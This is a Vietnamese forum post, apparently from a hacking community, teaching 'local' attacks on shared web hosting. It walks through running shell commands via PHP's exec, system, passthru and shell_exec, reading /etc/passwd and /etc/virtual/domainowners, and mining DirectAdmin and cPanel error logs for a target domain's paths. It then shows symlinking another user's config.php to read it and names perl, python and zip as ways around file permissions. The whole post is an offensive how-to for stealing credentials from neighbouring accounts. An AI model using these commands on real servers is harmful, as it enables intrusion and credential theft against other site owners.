Share Tư duy local cơ bản

[VnSlo]

[+] Sử dụng các hàm system call của php để thực thi các command
các hàm system call thường là
exec -->> http://php.net/manual/en/function.exec.php
passthru -->> http://www.php.net/manual/en/function.passthru.php
system -->> http://www.php.net/manual/en/function.system.php
shell_exec -->> http://www.php.net/manual/en/function.shell-exec.php
... etc ..
Vậy ta sẽ thực thi command gì khi các hàm này không bị disabled
Đọc trực tiếp file config của mục tiêu bằng
cat , more , less
Hoặc chuyển đến thư mục của mục tiêu bằng lệnh cd rồi đọc file config bằng cat , more , less hoặc editfile bằng php nếu chmod yếu ....
Xem danh sách các user
cat /etc/passwd
Xem đường dẫn của website qua error_log
DirectAdmin
tail -n 10000 /var/log/httpd/domains/parkdream1.com.error.log|grep parkdream1
Cpanel
tail -n 10000 /usr/local/apache/logs/error_log|grep parkdream1
Danh sách username và domain tương ứng ( đối với DirectAdmin )
cat /etc/virtual/domainowners
Tiếp đến
Tạo file symlink đến mục tiêu thường là file config
ln -s /home/user/public_html/forum/includes/config.php 1.txt
đọc file 1.txt
thường ta sẽ không có quyền đọc file symlink 1.txt này do bị chmod ....
Nhưng ta có thể mượn các tiến trình cao hơn để đọc như
perl , python , zip , Followsymlink ....